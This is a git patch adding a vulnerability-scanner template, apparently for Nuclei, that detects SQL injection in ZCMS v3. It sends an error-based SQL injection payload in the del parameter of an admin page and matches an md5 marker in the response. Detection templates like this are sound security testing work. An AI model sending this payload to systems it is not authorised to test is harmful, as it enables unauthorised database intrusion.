From 2aa7764e5829eca5f5ea62ced10cfc4f8693d78f Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Fri, 23 Apr 2021 18:48:00 +0530
Subject: [PATCH] Create zcms-v3-sqli.yaml

---
 vulnerabilities/other/zcms-v3-sqli.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 vulnerabilities/other/zcms-v3-sqli.yaml

diff --git a/vulnerabilities/other/zcms-v3-sqli.yaml b/vulnerabilities/other/zcms-v3-sqli.yaml
new file mode 100644
index 0000000000..3936c83257
--- /dev/null
+++ b/vulnerabilities/other/zcms-v3-sqli.yaml
@@ -0,0 +1,21 @@
+id: zcms-v3-sqli
+info:
+  name: ZCMS SQL Injection
+  author: princechaddha
+  severity: high
+  reference: https://www.anquanke.com/post/id/183241
+  tags: zcms,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "6f7c6dcbc380aac3bcba1f9fccec991e"
+        part: body